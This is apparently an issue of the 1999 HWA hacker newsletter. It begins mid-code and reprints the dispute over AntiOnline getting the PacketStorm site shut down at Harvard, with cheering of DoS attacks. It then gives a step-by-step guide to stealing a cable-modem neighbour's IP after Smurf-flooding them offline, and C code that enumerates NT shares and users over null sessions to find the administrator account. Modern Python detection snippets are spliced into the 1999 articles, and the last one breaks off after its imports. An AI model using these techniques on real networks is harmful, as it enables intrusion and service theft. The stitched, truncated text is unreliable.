      *
      *... who the fuck does JP think he is? fucking with PSS
      *there goes a ton of Ken's work down the drain...fuck AntiOnline!
      *(Read section AA.A)
      *
      *anyway enjoy this issue and shouts out to HackCanada..and Ken
      *Williams ..
      *
      *
      */
      printf ("EoF.\n");
      }

      Issue #23, rocking your sysadmin and hax0r asses in 99...

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net; complaints and all nastygrams and
     mailbombs can go to /dev/nul; nukes, synfloods and papasmurfs to
     127.0.0.1; private mail to cruciphux@dok.org

     danke.

     C*:.


     @HWA
     
 AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       On the morning of June 30th a call from John Vranesevich (aka JP) of AntiOnline to
       Harvard started off an avalanche of events that culminated in the 
       plug being pulled at packetstorm.harvard.edu. It was initially reported that
       the entire site was lost along with personal data; this may now
       not be the case. Included here are statements from JP, Harvard, Ken 
       Williams and stories from Attrition.org, HNN (http://www.hackernews.com)
       and other sources.... read the sordid story below - Ed
       
      
      
       (At this time it is uncertain whether Ken does or does not have backups of
        his PacketStorm site available to him but some people on the net have 
        taken it upon themselves to begin a new mirror and are calling for people
        that have downloaded from the site to re-upload the files to the following
        url; http://packetstorm.nl.linux.org/    - Ed )
        
        
             
                         
       From: Ken Williams <jkwilli2@unity.ncsu.edu>
       X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu
       To: The Usual Suspects:  ;
       Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)
       
       -----BEGIN PGP SIGNED MESSAGE-----
       
       
       Hi,
       
       
       I just got off the phone (6/30/99 PM) with one of the Harvard 
       Network managers.  John Vranesevich, of www.AntiOnline.com, 
       contacted Harvard this morning and threatened to sue them 
       because of the content in the jp/ directory of the Packet 
       Storm Security web site that was located at 
       http://packetstorm.harvard.edu, and before that at 
       http://packetstorm.genocide2600.com (see www.attrition.org 
       for details about this info).  I was told that the situation 
       quickly escalated to the Harvard Office of General Counsel.  
       John Vranesevich claims that I was using the server as a 
       platform to harass and threaten him, his family, and his 
       business.  Nothing could be further from the truth.  I ran
       a network security related web site and archive!
       
       The result:  the server and the web site and its contents
       are permanently offline, I have no access to even retrieve
       anything off of the server, the site known as "Packet Storm 
       Security" is history now.  I was told by Leo Donnelly at 
       Harvard, via phone, that ALL of the content AND the backups 
       made are either destroyed, being destroyed now, or will be 
       before I can do anything to prevent it.  All 4+ GB of files
       in the publicly accessible directories, over 45,000 files 
       collected and archived over the years, are gone.  There was 
       another 4 GB that was composed of research data, customized
       IDS, Linux, Apache software, etc too.
       
       Harvard is facing a lawsuit from JP, I am facing a lawsuit
       from JP, and possibly some sort of legal action from Harvard.
       Harvard seems to be trying to free themselves of any liability, 
       and use me as the fall guy for this whole thing.  All 
       agreements with Harvard in the beginning were verbal (with 
       Jeff Gray, the senior sysadmin), so I've got nothing on paper 
       to back up the truth.  I've got emails, but I don't have the
       money or legal defense to counter Harvard, or anybody else for 
       that matter.
       
       This has turned really ugly, really quickly, and it is very 
       plausible that I will be facing charges involving "hacking" 
       or computer crimes of some sort, because I "never had a 
       Harvard ID, and thus was not authorized to use their
       facilities", and I "compromised their security."  I guess it
       doesn't matter that I was contacted by the Senior Sysadmin at
       Harvard and invited to move my site there.  It doesn't matter 
       that the head of Harvard UIS approved of everything.  It 
       doesn't matter that he placed the box on a subnet of his 
       choosing and called me and gave me the root password and told 
       me I had free rein on the box.  It doesn't matter that 
       Harvard network security was never actually compromised.  
       For the record, Jeff Gray, the Harvard senior sysadmin, has 
       been extremely supportive of my site and work from the 
       beginning, and he deserves A LOT of credit for going out of 
       his way to help keep Packet Storm Security alive and online.  
       In fact, Jeff Gray has provided so much support for "the 
       security community" in general, and is so supportive of 
       security-related research and projects, that he deserves all 
       the credit in the world for his efforts.  I hope Harvard
       gives him the credit he is due, because any network security
       they have is in large part due to his skills, devotion, and 
       diligence.
       
       If that's not enough to annoy me, all of my class work for 
       the class I'm taking at NCSU this summer (CSC499 Independent 
       Research project involving IDS) is/was on that server at 
       Harvard and gone now too.  With 4 weeks left in the semester 
       here at NCSU, I have just lost seven weeks of work and data 
       that cannot be replaced in 4 weeks.  
       
       What bothers me the most is that all of the countless hours I
       put into that web site and the archives, thousands of hours,
       are gone now, for good.
       
       The site was getting over 400,000 hits/day and doing about
       10 GB/day in transfers, so I don't see it coming back online
       even if I do get any of the site content back.
       
       Obviously, I have taken full responsibility for the site
       content and all activities and events associated with that 
       server.  Even though no laws or rules were broken, on my part,
       and to my knowledge, I am now facing possible legal action 
       from both JP and Harvard, and state/federal computer crime 
       charges as well.  
       
       What am I going to do now?  I don't know.  The web site I
       devoted most of my waking hours to is gone.  My chances of
       passing my CSC499 class do not look good, according to the 
       negative comments from my professor.  I'll try to salvage
       the summer's worth of course work anyway if possible and pass.  
       
       Until formal charges are filed, I've still got my job and 
       account here at NCSU.  When NCSU catches wind of this, and 
       I'm sure they will, my account probably will be permanently 
       revoked, and my job and the past three years of school will 
       then be gone too.  Until then, I can be contacted at the email 
       address in the sig below.
       
       Check out the news and history of John Vranesevich and 
       Carolyn Meinel's smear and harassment campaigns that have ruined 
       the careers and lives of many people, mine included. 
       www.attrition.org has all of the details.
       
       Funny how I spent the past few years donating my time, literally
       thousands and thousands of hours, to "the security community", 
       never asking for or making a single penny off the time and work 
       I invested, and have now lost it all because John Vranesevich 
       and a few of his IRC friends are able to make quick phone calls, 
       fabricate absurd stories about criminal activity, libel, threaten 
       to sue Harvard, and I don't even get to plead my case.  I am 
       guilty without even being informed of what was going on.
        
       He has effectively ruined years of my work, my education, my 
       career, my life.  
       
       There are really only four things that I'd like right now:
       
       1. Justice
       2. Truth
       3. The 3 GB of MY data that Harvard has and refuses to turn 
          over to me
       4. A job in the IT/IS/IW industries - the pay doesn't even matter,
          I'm willing to move, I'm willing to put in 60-80 hour weeks.
          Just give me a UNIX or Linux box to work from.
       
       I'll settle for just the job though, and like I said, the pay 
       doesn't matter - I love computers, network security, and systems 
       administration.  If I was not doing it for pay, I'd be doing it 
       for free.
       
       See you at BlackHat and DEFCON.
       
       take it easy,
       
       Ken Williams
       jkwilli2@unity.ncsu.edu
       
       if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu
       and CC the email to packetstorm@genocide2600.com with phone # request.
       
       my pgp keys are available on all of the regular keyservers, and at
       www4.ncsu.edu/~jkwilli2/
       
       [Note: yes, you can quote or print any part of or the whole email.]
       
       Ken Williams
       
       ken@packetstorm.harvard.edu
       Packet Storm Security  http://packetstorm.harvard.edu               
       
       
       -----BEGIN PGP SIGNATURE-----
       Version: PGPfreeware 5.0i for non-commercial use
       Charset: noconv
       
       -----END PGP SIGNATURE-----


       ***************************************************************************
       -=-
       
       Net Thug Shuts Down Largest Free Security Site
       Wed Jun 30 16:36:10 MDT 1999
       ATTRITION Staff
       
       Earlier today, the PacketStorm Security site was abruptly shut down
       with no warning. PacketStorm (packetstorm.harvard.edu)
       was one of the largest and most respected sites catering to security
       professionals worldwide. Boasting an average of 400,000 hits a day,
       pushing out roughly 10 gigs of traffic, the site was a valuable resource 
       to an estimated 10,000 security professionals world wide.
       
       The security resource did not suffer at the hands of hackers or 
       network intruders. Instead, a new kind of malicious criminal found 
       success through a fear that haunts more and more Americans today.
       A single piece of email from John Vranesevich (founder of AntiOnline)
       to the educational institution hosting Packetstorm threatened a lawsuit if 
       the site was not shut down. Harvard said there were "numerous" complaints,
       but provided no additional details.
       
       Like most US institutions, the idea of being dragged to court for any 
       reason is enough to scare them into hasty action. With that mail, 
       Harvard pulled the plug. This decision was no doubt made as an easy 
       alternative to spending time and resources  fighting the claims.
       
       Email from Ken Williams, primary administrator for the site, to Attrition
       staff indicated that not only did Harvard shut down the site, they denied 
       him access to the machine and all information stored on it. The correspondence
       noted the likelihood that all information on the machine, and all
       backups would be destroyed in order to avoid the AntiOnline lawsuit.
       "All of the content and the backups made are either destroyed, being
       destroyed now, or will be before I can do anything to prevent it." said
       PacketStorm founder Ken Williams.
       
       Williams went on to say that he does not fear any fraudulent lawsuit
       Vranesevich could attempt to level at him. The information contained
       on the site regarding Vranesevich was not in violation of any US law
       that he was aware of, and had been there for over a year. Along with
       the security site, months of Williams's own school work was lost. 
       "I have just lost seven weeks of [class] work and data that cannot be 
       replaced in 4 weeks." Williams said, referring to deadlines on the
       school work.
       
               "What bothers me the most is that all 
                of the countless hours I put into
                that web site and the archives, thousands 
                of hours, are gone now, for good."
                       - Ken Williams, PacketStorm founder
       
       These vague and unfounded legal threats only serve to hurt the security
       community. AntiOnline's mission statement claims they exist "to educate
       the public on computer security related issues." Apparently, this
       mission statement forgot to include such things like "educate the public
       through OUR site only" and "as long as we profit from it".
       
       
       ***************************************************************************
             
       JP has since offered this news:
       http://www.antionline.com/archives/editorials/packetstorm.html
       
       ( Likely suffering major DoS attacks as a result of their actions, I was unable
         to get thru to the site to read their shit for posting here...they will burn
         in hell for this action - Ed )
       
       
       Ok I cut thru the cruft, here's JP's 'story';
       
       PacketStorm Is Shut Down
       An AntiOnline Editorial
       Thursday , July 01 1999
       
       Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of
       materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP.
       
       On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public
       surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company.
       
       While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about
       another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and
       requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own.
       Below is a copy of that letter:
       
       Greetings:
       
       May I first say that I did my best to see that this letter got sent to the appropriate individuals.  I had some difficulty determining who those individuals may be,
       so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s).
       
       My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA.
       
       Earlier today, one of my colleagues forwarded me the following URL:
       
       http://packetstorm.harvard.edu/jp/
       
       Needless to say, I was shocked and outraged at what I saw.  This page contains a large archive of libelous and, to put it bluntly, sick material.  Everything
       from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people
       engaged in homosexual activities, to a nun that appears to be covered in seminal fluid.
       
       I am astounded that an institution as prestigious as Harvard would be party to the dissemination of this type of material.  It is my hope that the University
       Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly.
       
       I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear
       violation of that policy. 
       
       It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded.
       
       I hope to hear from you soon about this matter, and what you may have done regarding it.
       
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       
       
       Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part:
       
       Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and
       work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about
       criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life. 
       
       Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not lose your site because of me, you lost it because of you. I
       could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you,
       and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will
       admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best
       of success in all that you do.
       
       Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and
       began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken
       against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However,
       I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious
       hackers.
       
       People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous.
       
       Yours In CyberSpace,
       John Vranesevich
       Founder, AntiOnline
       
       -=-    
       ***************************************************************************
       
       
       Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/ 
       
       
       " Support for Ken Williams Continues to Grow 


         contributed by Space Rogue 
         The outpouring of support for Ken Williams and Packet
         Storm Security has been phenomenal. One such item of
         support has been the beginning of an effort to rebuild
         PSS from scratch as a grassroots effort. The organizer
         of this is asking anyone who ever downloaded a file from
         PSS to upload it here. 

         PacketStorm Mirror 
         http://packetstorm.nl.linux.org/
       
       ***************************************************************************
       
       Statement from Harvard:
       
       ======================= 

       * S T A T E M E N T * 

       As a service to the Internet community, Harvard agreed
       to host a Packet Storm Security Website for
       security-related materials only. Without Harvard's
       knowledge, unrelated content was put on the Harvard
       server, including sexually-related material and personal
       attacks on an individual not affiliated with the University.
       A Harvard administrative site focused on security issues is
       not the forum for this type of material. We are returning
       the content on the site and hope that Packet Storm will
       make its security tools available through its own Website. 

       Joe Wrinn
       Director
       Office of News and Public Affairs

       Joe Wrinn
       Director, Harvard News Office
       1350 Massachusetts Ave., Rm. 1060
       Cambridge, MA 02138     
       
       ***************************************************************************
       
       Ken's Rebuttal to the Harvard statement;
       
       Date: 7/1/99 17:58
       Received: 7/1/99 18:01
       From: Ken Williams, jkwilli2@unity.ncsu.edu

       Hi, 

       [The Harvard] statement is incorrect, and even libelous
       itself by implying that I had "sexually related material" on
       the server. I NEVER did! 

       NOW, I will retain legal counsel. This is outrageous! 
       
       I wouldn't have been surprised to find myself slandered by
       John Vranesevich and AntiOnline, but to have Harvard
       implicitly state that I was serving up "sexually related
       material" to the Internet is absurd, libelous, and legally
       reprehensible. 

       Are you, Harvard, trying to ruin my reputation and career
       now too? 

       It sounds to me like you are fabricating this "sexually
       related material and personal attacks" statement to
       appease your critics, and, as I (now ominously) mentioned
       in my first open letter, trying to use me as the fall guy. 

       Regretfully, 

       Ken Williams 
       
       ***************************************************************************
       
       
       ZDNet;
       
       ZDNN: Harvard caught in hacker crossfire
       Tue, 01 April 1996 18:29:02 GMT

       Harvard University is caught in the middle of an online war between hacking-scene
       follower AntiOnline.com and the hacking community at large.
       
       On Wednesday, the Cambridge, Mass., university removed an independent security 
       Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days. 
       
       
       The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that
       had "sexually related material and personal attacks on an individual not affiliated with the 
       University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement 
       released by Harvard on Thursday.

       "We agreed to have a site that had security-related materials only," said Wrinn. "Both parties
        involved were using us in a way that was completely inappropriate."
    
       Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily
       refuted the allegations.

       "This statement is incorrect, and even libelous itself by implying that I had 'sexually related 
       material' on the server," he wrote in an e-mail. "I never did!"

        
       According to Williams, the directory -- labeled "/jp" because it was a collection of material 
       satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. 
 
       But others familiar with the site said that the parody also contained photos of nude women that were 
       intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did
       not know specifically what sort of "sexual" content was contained on the site. 


       Harvard in the hot seat
       

       "We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly 
       uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete
       contents of the site back to Williams so that he can post it elsewhere.
       
       No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers
       and security experts to get up-to-date security information.

       "Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of
       the Webmasters at hacker news and information site Attrition.org. "It was updated daily with tools. It
       was always there." 

       Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of
       Investigation, claimed Webmaster Williams.
       
       'I didn't have an anti-J.P. Temple of Hate'
       
       Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly 
       -- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and 
       webmaster of The Happy Hacker.

      "I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, 
      organizations, and individuals out there that -- we believe -- are black-eyes of the industry."


      So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of 
      AntiOnline's founder. 


      The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the
      most part, AntiOnline and its main foe, Attrition.org, have squared off with conflicting allegations of slander,
      libel and plagiarism. 
      
      
      "I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding 
      that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source
      already online, the Packet Storm Webmaster thought the pictures were fair game.

      Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost
      -- and Harvard quickly took the site down.


      Did Harvard act too quickly?


      B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly.

      "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential
       suit," he said. Yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the 
       cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week
        -- defaced another government Web site with the news.


     "Now, because of; JP ... Packetstorm is no more, and never will be again," the site http://www.aao.uc.usbr.gov/ 
      lamented.


      Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- 
      which floods a particular site with random data -- so severe that its Internet service provider pulled the site for 
      almost 12 hours on Thursday, said Vranesevich.
     
      Ugly threats


      Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have 
      in five years," he said.


      Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down.


      "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of 
      Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone."

      In his mind, the contents of "/jp" did.
      
       
       @HWA
     
 03.0 Cable Modem Hijacking from www.hackcanada.com
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
      
      Cable Modem IP Hijacking in Win95/98
       
       The purpose of this is to show you how bad cable modem security is and that 
       even with a win box you can take someone else's IP. You can hijack IPs using 
       a cable modem and it's very simple in any operating system.
       
       Just follow the steps:
       
       1) Choose someone's IP that you wish to have. Make sure the IP is on the same 
       network. Most cable modem providers use DHCP. The first thing you have to do is 
       find the victim's IP. Remember the victim's IP has to be in the same network and 
       with the same service provider for this to work.
       
       2) Now this is probably the hardest thing in this file (but it's still easy), 
       you have to wait until the victim's computer is off or you can Smurf kill his 
       connection. When you think his computer is off-line just try to ping it to see 
       if you get a response. Do this by going to a DOS prompt and typing ping 
       (victim's IP). If you get a response then you have to try harder.
       
       After you get his PC off-line then you go into your network properties and edit 
       the IP settings, but instead of having yours there you put the victim's IP, 
       host, and domain.
       
       3) Restart. If you restart and you get an IP conflict this means that the 
       victim's computer is on, if you don't get an IP conflict then try to go to your 
       web browser and see if it works. With some cable modem providers you might have 
       to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS search, and 
       Domain.
       
       
       Now you can go. Everything will work until the victim's PC is back on. Once it 
       is back online it will take the IP away because it will tell you that you have 
       the wrong MAC address.
       
       
       *Linux*
       This is also possible in Linux, but is not the best way. You can change your 
       MAC address to that of the victim's PC and this is more secure and much easier. 
       There are a couple of scripts to change your address, just look around.
       
       
       Warning: Some cable modem service providers will know when you're using the 
       wrong IP, but hey, it might be useful.
       
       
       Copyright (c) 1999 Wildman
       
       www.hackcanada.com
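
       Seen from the provider's or a network administrator's side, the takeover
       above is an address answering from a MAC that DHCP never leased it to.
       The check below is an added example, not part of Wildman's text; the lease
       and ARP-observation record layouts, addresses and MACs are constructed
       assumptions.

```python
"""Flag IP addresses that answer from a MAC other than the one DHCP leased them to."""
from collections import namedtuple
from datetime import datetime, timedelta

Lease = namedtuple("Lease", "ip mac start end")
Alert = namedtuple("Alert", "kind time ip seen_mac leased_mac")
FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample data. Lease lines: ip mac start-date start-time seconds.
SAMPLE_LEASES = """\
10.20.0.15 00:10:4b:aa:01:02 1999-07-01 08:00:00 86400
10.20.0.16 00:60:97:bb:03:04 1999-07-01 09:30:00 86400
"""
# Constructed ARP observations (date time ip mac), e.g. from a monitoring port.
SAMPLE_ARP = """\
1999-07-01 10:00:00 10.20.0.15 00:10:4b:aa:01:02
1999-07-01 10:00:05 10.20.0.16 00:60:97:bb:03:04
1999-07-01 23:10:00 10.20.0.15 00:A0:24:CC:05:06
1999-07-01 23:40:00 10.20.0.15 00:10:4b:aa:01:02
1999-07-01 23:45:00 10.20.0.99 00:a0:24:cc:05:06
"""


def parse_leases(text):
    leases = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, mac, day, clock, seconds = line.split()
        start = datetime.strptime(f"{day} {clock}", FMT)
        end = start + timedelta(seconds=int(seconds))
        leases.append(Lease(ip, mac.lower(), start, end))
    return leases


def parse_arp(text):
    for line in text.splitlines():
        if line.strip():
            day, clock, ip, mac = line.split()
            yield datetime.strptime(f"{day} {clock}", FMT), ip, mac.lower()


def find_takeovers(leases, observations):
    """Return alerts in time order.

    mac-mismatch   : address is leased, but a different MAC is using it
    owner-returned : the leased MAC is back after another MAC held the address
    no-lease       : address is in use although nobody holds a lease for it
    """
    alerts = []
    last_mac = {}  # ip -> MAC seen most recently
    for when, ip, mac in sorted(observations):
        active = [l for l in leases if l.ip == ip and l.start <= when < l.end]
        if not active:
            alerts.append(Alert("no-lease", when, ip, mac, None))
        elif all(l.mac != mac for l in active):
            alerts.append(Alert("mac-mismatch", when, ip, mac, active[0].mac))
        elif last_mac.get(ip, mac) != mac:
            alerts.append(Alert("owner-returned", when, ip, mac, active[0].mac))
        last_mac[ip] = mac
    return alerts


def suspect_macs(alerts):
    """MACs that used an address they did not hold a lease for."""
    return {a.seen_mac for a in alerts if a.kind in ("mac-mismatch", "no-lease")}


if __name__ == "__main__":
    found = find_takeovers(parse_leases(SAMPLE_LEASES), parse_arp(SAMPLE_ARP))
    for a in found:
        print(a.time, a.kind, a.ip, "seen", a.seen_mac, "leased to", a.leased_mac)
    print("MACs to investigate:", sorted(suspect_macs(found)))
```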
     
     
      @HWA
        
       
 04.0 Exploiting Null Session Weaknesses in NT environment
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
 
 
                     Details About NULL Sessions

     This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true
     administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to
     better understand the NT environment and recognize code that might be used against them.

     The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS
     networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information. 

     The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which
     they weren't authenticated, but that the authenticated group had permissions for. Originally, 'everyone' did not mean 'anyone'. You still
     had to log on to be in the everyone group. However, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the
     reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean
     'anyone' - until someone finds an exploit.

     The following code segments are commented to show exactly what is happening, what API's are being used, and how the true
     administrator name can be identified.

     First - making a  NULL Session connection

     One way to do this is by using the Net Use command with an empty password. Programmatically, it looks like this....

     //Needs the MFC headers plus <lm.h> for the Net* APIs; link with netapi32.lib
     #include <lm.h>

     //This function called from dialog that fills listbox with connections

     BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
     {
     //Setup for UNICODE 
     char* pTemp = TargetHost.GetBuffer(256);
     WCHAR wszServ[256];
     LPWSTR Server = NULL;

     //Convert to Unicode
     MultiByteToWideChar(CP_ACP, 0, pTemp,
                             strlen(pTemp)+1, wszServ,
                             sizeof(wszServ)/sizeof(wszServ[0]) );

     //Create the IPC$ share connection string we need 
     Server = wszServ;

     LPCWSTR szIpc = L"\\IPC$";
     WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
     DWORD dwServNameLen;
     DWORD dwRC;

     //Setup Win32 structures and variables we need
     NET_API_STATUS nas;

     USE_INFO_2 ui2;
     SHARE_INFO_1* pSHInfo1 = NULL;
     DWORD            dwEntriesRead;
     DWORD            dwTotalEntries;

     //Set up handles to tree control to insert connection results 

     HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;

     char sharename[256];
     char remark[256];

     if(Server == NULL || *Server == L'\0')
     {
     SetLastError(ERROR_INVALID_COMPUTERNAME);
     return FALSE;
     }

     dwServNameLen = lstrlenW( Server );

     //Test for various errors in connection string and recover
     if(Server[0] != L'\\' && Server[1] != L'\\')
     {
     // prepend slashes and NULL terminate
     RemoteResource[0] = L'\\';
     RemoteResource[1] = L'\\';
     RemoteResource[2] = L'\0';
     }
     else
     {
     dwServNameLen -= 2; // drop slashes from count
     RemoteResource[0] = L'\0';
     }

     if(dwServNameLen > CNLEN)
     {
     SetLastError(ERROR_INVALID_COMPUTERNAME);
     return FALSE;
     }

     if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
     if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;
     //Start with clean memory
     ZeroMemory(&ui2, sizeof(ui2));
     //Fill in the Win32 network structure we need to use connect API
     ui2.ui2_local = NULL;
     ui2.ui2_remote = (LPTSTR) RemoteResource;
     ui2.ui2_asg_type = USE_IPC;
     ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL
     ui2.ui2_username = (LPTSTR) L"";
     ui2.ui2_domainname = (LPTSTR) L"";

     //MAKE THE NULL SESSION CALL 
     nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);

     dwRC = GetLastError();
     if( nas == NERR_Success ) 
     {
         machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);
     }

     //THIS IS WHERE NT HANDS OUT ITS INFORMATION
     nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
                             MAX_PREFERRED_LENGTH, 
                             &dwEntriesRead, 
                             &dwTotalEntries, NULL);

     dwRC = GetLastError();
     if( nas == NERR_Success ) 
     {
         if(dwTotalEntries > 0)
         {
             shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot, TVI_LAST);
             userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot, TVI_LAST);
             adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot, TVI_LAST);
         }
         for(int x=0; x<(int)dwTotalEntries; x++)
         {
             // Convert back to ANSI
             WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1,
                                 sharename, 256, NULL, NULL ); 

             WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,
                                 remark, 256, NULL, NULL ); 
             CString ShareDetails = sharename;
             ShareDetails = ShareDetails + " - " + remark; 
             //fill the tree with connect info
             attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot, TVI_LAST);
             pSHInfo1++;
         }
     }

             //My Wrapper function for listing users - see below
             DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

     //WE ARE DONE, SO KILL THE CONNECTION
     nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

     TargetHost.ReleaseBuffer();
     SetLastError( nas );
     return FALSE;
     }

     The following function is how one can programmatically determine the administrator status of an account......

     bool GetAdmin(char* pServer, char* pUser, CString& Name)
     {
         char szDomainName[256];     // receives the domain the account lives in
         DWORD dwDomainName = sizeof(szDomainName);
         DWORD dwSize = 0;           // SID size, reported by the first call
         DWORD dwAdminVal = 0;
         SID_NAME_USE use;
         PSID pUserSID = NULL;       // SID for user
         int iSubCount = 0;
         bool bFoundHim = false;

         //Call API for buffer size since we don't know size beforehand
         LookupAccountName(pServer, 
                         pUser, pUserSID,
                         &dwSize, szDomainName,
                         &dwDomainName, &use );

         //Anything other than "buffer too small" means the lookup itself failed
         if(GetLastError() != ERROR_INSUFFICIENT_BUFFER)
             return false;

         //Allocate a larger buffer
         pUserSID = (PSID) malloc(dwSize);
         if(pUserSID == NULL)
             return false;

         //Repeat call now that we have the right size buffer
         dwDomainName = sizeof(szDomainName);
         if(!LookupAccountName(pServer,
                         pUser, pUserSID,
                         &dwSize, szDomainName, 
                         &dwDomainName, &use ))
         {
             free(pUserSID);
             return false;
         }

         //Scan the SIDS for the golden key - ADMIN == 500 

         //Get a count of SID's
         iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); 
         //Admin SID is the last element in the count
         if(iSubCount > 0)
             dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

         if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN
         {
             Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
             bFoundHim = true;
         }

         free(pUserSID); //allocated with malloc, so free() rather than delete
         return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE
     }
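
     What GetAdmin() reads, shown on the raw bytes of a SID. This is an added example, not NT OBJECTives' code: it parses the binary
     SID layout and picks out the account whose last sub-authority (RID) is 500, which is why renaming the Administrator account
     does not hide it. The account names and the domain identifier are constructed.

```python
"""Parse binary Windows SIDs and find the built-in Administrator by its RID."""
import struct

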